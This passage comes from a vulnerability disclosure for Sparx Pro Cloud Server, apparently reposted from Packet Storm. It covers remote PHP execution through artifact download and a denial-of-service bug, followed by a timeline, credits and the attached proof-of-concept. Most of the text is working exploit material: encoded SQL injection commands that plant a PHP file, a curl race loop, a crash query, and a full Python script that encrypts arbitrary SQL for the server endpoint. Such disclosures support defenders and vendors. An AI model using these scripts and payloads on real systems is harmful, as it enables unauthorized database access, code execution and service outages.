1. Using vulnerabilities #1 and #2 attacker can create the artifact in
the target repository:
┌────
│ python3 eacrypt.py https://${PCS_HOSTNAME} ${MODEL_NAME} "insert into t_object (object_id, object_type, name, author, style, ea_guid) values (100000, 'Artifact', 'poc.php', 'Admin', 'ExtDoc=1;', '{\!A}8889BA10-6178-4047-9273-37FC75B0FCF6{\!C}')"
│ # insert the document (zipped php file simply printing "Test") as "poc.php"
│ python3 eacrypt.py https://${PCS_HOSTNAME} ${MODEL_NAME} "insert into t_document (docid, docname, elementid, elementtype, bincontent, doctype, author, isactive, sequence) values ('{\!A}8889BA10-6178-4047-9273-37FC75B0FCF6{\!C}', 'poc.php', '{\!A}8889BA10-6178-4047-9273-37FC75B0FCF6{\!C}', '.php', cast(x'504b03041400000008005497575bfe1a3fd00c0300006141030007001c007374722e6461745554090003bf5efa68ce5efa6875780b000104e803000004e8030000edcdb10980301000c0fee1e750d3b8809825b28104ec0ce8fe388556770bdc56c73932fa715ef3d4fafd4c4bc65a32daf7241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482492df92b266d43de305504b01021e031400000008005497575bfe1a3fd00c03000061410300070018000000000001000000a481000000007374722e6461745554050003bf5efa6875780b000104e803000004e8030000504b050600000000010001004d0000004d0300000000' as blob sub_type binary), 'ExtDoc', 'Admin', 177, 0)"
└────
2. In one terminal start to query the poc.php file until it is
executed:
┌────
│ while [ true ]; do curl 'https://${WEBEA_HOSTNAME}/data_api/poc.php' -k; done 2> /dev/null | grep Test
└────
3. While the above command is executing in another terminal or logged
in browser window open the following URL:
┌────
│ https://${WEBEA_HOSTNAME}/data_api/dl_internal_artifact.php?guid=el_%7B8889BA10-6178-4047-9273-37FC75B0FCF6%7D&modelno=1
└────
4. In the terminal from step 2 there should be "Test" printed (proof
that php code executed), if not try to repeat step 3.
Solution
────────
The solution should be to return the content without saving it to
disk. If necessary it should be saved in a temporary folder not
accesible within webserver. Also the temporary file does not have to
have the same name as the name returned - it should not use the
filename from the model (controlled by user).
[Vulnerability #5] Sparx Pro Cloud Server Deny of Service in the /SparxCloudLink.sseap endpoint
═══════════════════════════════════════════════════════════════════════════════════════════════
CVE
───
CVE-2026-42100 - DoS in Sparx Pro Cloud Server
Affected versions
─────────────────
Sparx Pro Cloud Server versions <= 6.1 build 167
CVSSv4
──────
8.7 High
(CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N)
Impact
──────
An attacker can make the PCS service exit causing a Deny of Service.
The error was not deeply analyzed but it is possible that this or
similar buffer operation bugs could be exploited to a code execution.
Details
───────
Sending an SQL query with started escape sequence "{" without the
finishing curly brace causes the PCS service to terminate
unexpectedly.
PoC
───
Run the following SQL query:
┌────
│ python3 eacrypt.py http://${PCS_HOSTNAME} model "select {asd"
└────
The script will finish with "Connection reset by peer" error and the
service will exit with the following message:
[FATAL]: ————————————– [FATAL]: Thread 112 Unrecoverable
error
Solution
────────
Correct the handling of escape sequencing and parsing the SQL query
for proper boundary checks. Recheck that there are no potential buffer
overflow errors within the logic.
Timeline
════════
• 09.2025 - Vulnerabilities identified.
• 21.11.2025 - Sending details to CERT Polska to contact vendor.
• 25.11.2025 - First contact of CERT Polska with Vendor.
• 06.02.2026 - First Vendor reply with standard first-support-line
questions about products, versions etc.
• 14.04.2026 - Because of lack of progress Vendor was informed about
planned publication according to the procedure - within 90 days of
providing details.
• 19.05.2026 - CVEs published.
References
══════════
• <https://sploit.tech/2026/05/19/Sparx-Enterprise-Architect-PCS.html>
- details with video
• <https://efigo.pl/blog/CVE-2026-42096/> - summary
• <https://cert.pl/en/posts/2026/05/CVE-2026-42096> - advisory
• <https://sparxsystems.com/products/procloudserver/> - product’s
website
Credits
═══════
Author: Blazej Adamczyk (br0x) | <https://sploit.tech/>
Team: Efigo <https://efigo.pl/>
--- packet storm attached poc ---
import sys
import requests
import urllib3
import pycurl
from io import BytesIO
import zipfile
k="HERE_SHOULD_BE_THE_KEY"
x=[4, 2, 0, 6, 3, 1, 5]
xr=[x.index(i) for i in range(7)]
def mangle(s:str) -> str:
o=bytearray(s,"utf-8")
for i in range((len(s) // 7)*7):
o[i]=ord(s[((i // 7)*7)+xr[i % 7]])
return o.decode("utf-8")
def demangle(s:str) -> str:
o=bytearray(s,"utf-8")
for i in range((len(s) // 7)*7):
o[i]=ord(s[((i // 7)*7)+x[i % 7]])
return o.decode("utf-8")
def custom_decode(ciphertext: str, key: str) -> str:
"""
Decode using the custom cipher.
ciphertext : input string (Unicode)
key : key string (Unicode)
Returns plaintext string (printable ASCII 0x20–0x7E).
"""
output_chars = []
length = len(ciphertext)
key_len = len(key)
for i, ch in enumerate(ciphertext):
# load plaintext character as integer
c_val = ord(ch)
# derive key value (word from key string)
k_val = ord(key[(i+length) % key_len])
c_val = c_val - 0x20 - k_val + 0x40
if c_val<0x20:
c_val=c_val+0x5E
if c_val>(0x5E+0x20):
c_val=c_val-0x5E
output_chars.append(chr(c_val))
return "".join(output_chars)
def custom_encode(plaintext: str, key: str) -> str:
"""
Encode plaintext using the custom cipher.
plaintext : input string (Unicode)
key : key string (Unicode)
Returns encoded string (printable ASCII 0x20–0x7E).
"""
output_chars = []
length = len(plaintext)
key_len = len(key)
for i, ch in enumerate(plaintext):
# load plaintext character as integer
c_val = ord(ch)
# subtract 0x40
c_val = c_val - 0x40
# derive key value (word from key string)
k_val = ord(key[(i+length) % key_len])
# add key
total = k_val + c_val
# modulo 94
total = total % 0x5E
# add 0x20 (ensures printable ASCII)
encoded_val = total + 0x20
# append encoded character
output_chars.append(chr(encoded_val))
return "".join(output_chars)
def test(debug_type, debug_msg):
print("debug(%d): %s" % (debug_type, debug_msg))
if __name__ == "__main__":
if (len(sys.argv)!=4):
print("Usage: "+sys.argv[0]+" URL_without_sparxcloudlink_path model_name sql")
exit(-1)
host = sys.argv[1]
repo = sys.argv[2]
sqli = sys.argv[3]
#url = "%s/SparxCloudLink.sseap?model=%s"%(host,repo)
url = "%s/SparxCloudLink.sseap"%(host)
print(url)
sqli = str(len(sqli))+":"+sqli
fill="+d1XL|@"
sqli += fill[-(7-(len(sqli)%7)):]
print (sqli)
#sqli="23:Select * from t_secuser|@"
ret=custom_encode(mangle(sqli),k)
binary=bytes([0,0,0,1,0,0])
binary+=bytes.fromhex('%04X'%(len(ret)*2+66))
binary+=bytes.fromhex('%04X'%(len(repo)))
for c in repo:
binary+=bytes([ord(c),0])
binary+=bytes([0,1,0,0])
binary+=bytes.fromhex('%04X'%(len(ret)))
for c in ret:
binary+=bytes([ord(c),0])
c=pycurl.Curl()
c.setopt(pycurl.URL, url)
c.setopt(pycurl.READDATA, BytesIO(binary))
c.setopt(pycurl.POSTFIELDSIZE, len(binary))
c.setopt(pycurl.POST, 1)
c.setopt(pycurl.VERBOSE, 1)
c.setopt(pycurl.DEBUGFUNCTION, test)
c.setopt(pycurl.HTTPHEADER, ['Content-Type: ' , 'Accept: ', 'EnterpriseArchitect-Build: 1527' , 'EnterpriseArchitect-InternalBuild: 481' , 'User-Agent: Enterprise Architect/15.1.1527' , 'Connection: Keep-Alive' , 'Cache-Control: no-cache'])
body = BytesIO()
c.setopt(pycurl.WRITEDATA, body)
c.setopt(pycurl.SSL_VERIFYPEER, 0)
c.setopt(pycurl.SSL_VERIFYHOST, 0)
c.perform()
c.close()
try:
z = zipfile.ZipFile(body)
print(z.read('query.xml').decode('utf-8'))
except zipfile.BadZipFile:
sys.stdout.buffer.write(body.getvalue())